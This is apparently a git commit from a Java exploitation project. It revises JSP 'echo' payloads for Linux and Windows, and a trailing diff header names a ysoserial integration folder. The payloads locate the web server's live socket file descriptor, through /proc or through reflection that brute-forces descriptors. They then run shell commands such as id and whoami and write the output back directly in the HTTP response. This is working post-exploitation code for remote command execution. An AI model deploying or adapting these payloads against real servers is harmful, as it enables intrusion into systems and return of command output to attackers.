对 LinuxEcho/WindowsEcho 进行修改

feihong · feihong · commit 2a0c2efdc907 · 2020-09-20T21:52:44.000+08:00
diff --git a/Linux/code/case2-Deprecated.jsp b/Linux/code/case2-Deprecated.jsp
@@ -0,0 +1,47 @@
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%
+    String command  = "ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\"[\"}''{print $2}'|sed 's/.$//'";
+    String[] cmd = new String[]{"/bin/sh", "-c", command };
+    java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
+    java.util.List res1 = new java.util.ArrayList();
+    String line = "";
+    while ((line = br.readLine()) != null){
+        res1.add(line);
+    }
+    br.close();
+
+    Thread.sleep((long)2000);
+
+    command  = "ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'";
+    cmd = new String[]{"/bin/sh", "-c", command };
+    br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
+    java.util.List res2 = new java.util.ArrayList();
+    while ((line = br.readLine()) != null){
+        res2.add(line);
+    }
+    br.close();
+
+    int index = 0;
+    int max = 0;
+    for(int i = 0; i < res1.size(); i++){
+        for(int j = 0; j < res2.size(); j++){
+            if(((String)res2.get(j)).contains((String)res1.get(i))){
+                String socketNo = ((String)res2.get(j)).split("\\s+")[1].substring(8);
+                socketNo = socketNo.substring(0, socketNo.length() - 1);
+                if(Integer.parseInt(socketNo) > max) {
+                    max = Integer.parseInt(socketNo);
+                    index = j;
+                }
+            }
+        }
+    }
+
+    int fd = Integer.parseInt(((String)res2.get(index)).split("\\s")[0]);
+    java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
+    c.setAccessible(true);
+    cmd = new String[]{"/bin/sh", "-c", "echo \"It works!\"" };
+    String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+    String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
+    java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));
+    os.write(result.getBytes());
+%>
diff --git a/Linux/code/case2.jsp b/Linux/code/case2.jsp
@@ -1,47 +1,58 @@
 <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 <%
-    String command  = "ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\"[\"}''{print $2}'|sed 's/.$//'";
-    String[] cmd = new String[]{"/bin/sh", "-c", command };
-    java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
-    java.util.List res1 = new java.util.ArrayList();
-    String line = "";
-    while ((line = br.readLine()) != null){
-        res1.add(line);
-    }
-    br.close();
+    if(java.io.File.separator.equals("/")){
+        String command  = "ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\"[\"}''{print $2}'|sed 's/.$//'";
+        String[] cmd = new String[]{"/bin/sh", "-c", command};
+        java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
+        java.util.List res1 = new java.util.ArrayList();
+        String line = "";
+        while ((line = br.readLine()) != null && !line.trim().isEmpty()){
+            res1.add(line);
+        }
+        br.close();
 
-    Thread.sleep((long)2000);
+        try {
+            Thread.sleep((long)2000);
+        } catch (InterruptedException e) {
+            //pass
+        }
 
-    command  = "ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'";
-    cmd = new String[]{"/bin/sh", "-c", command };
-    br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
-    java.util.List res2 = new java.util.ArrayList();
-    while ((line = br.readLine()) != null){
-        res2.add(line);
-    }
-    br.close();
+        command  = "ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'";
+        cmd = new String[]{"/bin/sh", "-c", command};
+        br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
+        java.util.List res2 = new java.util.ArrayList();
+        while ((line = br.readLine()) != null && !line.trim().isEmpty()){
+            res2.add(line);
+        }
+        br.close();
 
-    int index = 0;
-    int max = 0;
-    for(int i = 0; i < res1.size(); i++){
-        for(int j = 0; j < res2.size(); j++){
-            if(((String)res2.get(j)).contains((String)res1.get(i))){
-                String socketNo = ((String)res2.get(j)).split("\\s+")[1].substring(8);
+        int index = 0;
+        int max = 0;
+        for(int i = 0; i < res2.size(); i++){
+            try{
+                String socketNo = ((String)res2.get(i)).split("\\s+")[1].substring(8);
                 socketNo = socketNo.substring(0, socketNo.length() - 1);
-                if(Integer.parseInt(socketNo) > max) {
-                    max = Integer.parseInt(socketNo);
-                    index = j;
+                for(int j = 0; j < res1.size(); j++){
+                    if(!socketNo.equals(res1.get(j))) continue;
+
+                    if(Integer.parseInt(socketNo) > max) {
+                        max = Integer.parseInt(socketNo);
+                        index = j;
+                    }
+                    break;
                 }
+            }catch(Exception e){
+                //pass
             }
         }
-    }
 
-    int fd = Integer.parseInt(((String)res2.get(index)).split("\\s")[0]);
-    java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
-    c.setAccessible(true);
-    cmd = new String[]{"/bin/sh", "-c", "echo \"It works!\"" };
-    String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
-    String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
-    java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));
-    os.write(result.getBytes());
+        int fd = Integer.parseInt(((String)res2.get(index)).split("\\s")[0]);
+        java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
+        c.setAccessible(true);
+        cmd = new String[]{"/bin/sh", "-c", "id"};
+        String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+        String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
+        java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));
+        os.write(result.getBytes());
+    }
 %>
diff --git a/Windows/code/WindowsEcho-Deprecated.jsp b/Windows/code/WindowsEcho-Deprecated.jsp
@@ -0,0 +1,71 @@
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%
+    //准备工作&初始化
+    java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField("fd");
+    field.setAccessible(true);
+
+    Class clazz1 = Class.forName("sun.nio.ch.Net");
+    java.lang.reflect.Method method1 = clazz1.getDeclaredMethod("remoteAddress",java.io.FileDescriptor.class);
+    method1.setAccessible(true);
+
+    Class clazz2 = Class.forName("java.net.SocketOutputStream", false, null);
+    java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];
+    constructor2.setAccessible(true);
+
+    Class clazz3 = Class.forName("java.net.PlainSocketImpl");
+    java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});
+    constructor3.setAccessible(true);
+
+    java.lang.reflect.Method write = clazz2.getDeclaredMethod("write",new Class[]{byte[].class});
+    write.setAccessible(true);
+
+    java.net.InetSocketAddress remoteAddress = null;
+    java.util.List<Integer> list1 = new java.util.ArrayList<Integer>();
+    java.util.List<Integer> list2 = new java.util.ArrayList<Integer>();
+    java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();
+
+    //第一次尝试
+    for(int i = 0; i < 10000; i++){
+        field.set(fileDescriptor, i);
+
+        try{
+            remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor);
+            if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
+            list1.add(i);
+        }catch(Exception e){
+            //pass
+        }
+    }
+
+    //延迟2s
+    Thread.sleep(2000);
+
+    //第二次尝试
+    for(int i = 0; i < 10000; i++){
+        field.set(fileDescriptor, i);
+
+        try{
+            remoteAddress = (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor);
+            if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
+            list2.add(i);
+        }catch(Exception e){
+            //pass
+        }
+    }
+
+    //取交集
+    list1.retainAll(list2);
+
+    for(Integer fdVal : list1){
+        try{
+            field.set(fileDescriptor, fdVal);
+            Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});
+
+            String res = new java.util.Scanner(Runtime.getRuntime().exec("echo \"It works!!\"").getInputStream()).useDelimiter("\\A").next();
+            String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
+            write.invoke(socketOutputStream,  new Object[]{result.getBytes()});
+        }catch (Exception e){
+            //pass
+        }
+    }
+%>
diff --git a/Windows/code/WindowsEcho.jsp b/Windows/code/WindowsEcho.jsp
@@ -1,71 +1,50 @@
 <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 <%
-    //准备工作&初始化
-    java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField("fd");
-    field.setAccessible(true);
-
-    Class clazz1 = Class.forName("sun.nio.ch.Net");
-    java.lang.reflect.Method method1 = clazz1.getDeclaredMethod("remoteAddress",java.io.FileDescriptor.class);
-    method1.setAccessible(true);
-
-    Class clazz2 = Class.forName("java.net.SocketOutputStream", false, null);
-    java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];
-    constructor2.setAccessible(true);
-
-    Class clazz3 = Class.forName("java.net.PlainSocketImpl");
-    java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});
-    constructor3.setAccessible(true);
-
-    java.lang.reflect.Method write = clazz2.getDeclaredMethod("write",new Class[]{byte[].class});
-    write.setAccessible(true);
-
-    java.net.InetSocketAddress remoteAddress = null;
-    java.util.List<Integer> list1 = new java.util.ArrayList<Integer>();
-    java.util.List<Integer> list2 = new java.util.ArrayList<Integer>();
-    java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();
-
-    //第一次尝试
-    for(int i = 0; i < 10000; i++){
-        field.set(fileDescriptor, i);
-
-        try{
-            remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor);
-            if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
-            list1.add(i);
-        }catch(Exception e){
-            //pass
+    if(java.io.File.separator.equals("\\")){
+        java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField("fd");
+        field.setAccessible(true);
+
+        Class clazz1 = Class.forName("sun.nio.ch.Net");
+        java.lang.reflect.Method method1 = clazz1.getDeclaredMethod("remoteAddress",new Class[]{java.io.FileDescriptor.class});
+        method1.setAccessible(true);
+
+        Class clazz2 = Class.forName("java.net.SocketOutputStream", false, null);
+        java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];
+        constructor2.setAccessible(true);
+
+        Class clazz3 = Class.forName("java.net.PlainSocketImpl");
+        java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});
+        constructor3.setAccessible(true);
+
+        java.lang.reflect.Method write = clazz2.getDeclaredMethod("write",new Class[]{byte[].class});
+        write.setAccessible(true);
+
+        java.net.InetSocketAddress remoteAddress = null;
+        java.util.List list = new java.util.ArrayList();
+        java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();
+        for(int i = 0; i < 50000; i++){
+            field.set((Object)fileDescriptor, (Object)(new Integer(i)));
+            try{
+                remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, new Object[]{fileDescriptor});
+                if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
+                if(remoteAddress.toString().startsWith("/0:0:0:0:0:0:0:1")) continue;
+                list.add(new Integer(i));
+
+            }catch(Exception e){}
         }
-    }
-
-    //延迟2s
-    Thread.sleep(2000);
-
-    //第二次尝试
-    for(int i = 0; i < 10000; i++){
-        field.set(fileDescriptor, i);
-
-        try{
-            remoteAddress = (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor);
-            if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
-            list2.add(i);
-        }catch(Exception e){
-            //pass
-        }
-    }
-
-    //取交集
-    list1.retainAll(list2);
-
-    for(Integer fdVal : list1){
-        try{
-            field.set(fileDescriptor, fdVal);
-            Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});
 
-            String res = new java.util.Scanner(Runtime.getRuntime().exec("echo \"It works!!\"").getInputStream()).useDelimiter("\\A").next();
-            String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
-            write.invoke(socketOutputStream,  new Object[]{result.getBytes()});
-        }catch (Exception e){
-            //pass
+        for(int i = list.size() - 1; i >= 0; i--){
+            try{
+                field.set((Object)fileDescriptor, list.get(i));
+                Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});
+                String[] cmd = new String[]{"cmd","/C", "whoami"};
+                String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next().trim();
+                String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + (res.length()) + "\n\n" + res + "\n\n";
+                write.invoke(socketOutputStream, new Object[]{result.getBytes()});
+                break;
+            }catch (Exception e){
+                //pass
+            }
         }
     }
 %>
diff --git a/集成到ysoserial/DirectiveProcessor.java b/集成到ysoserial/DirectiveProcessor.java
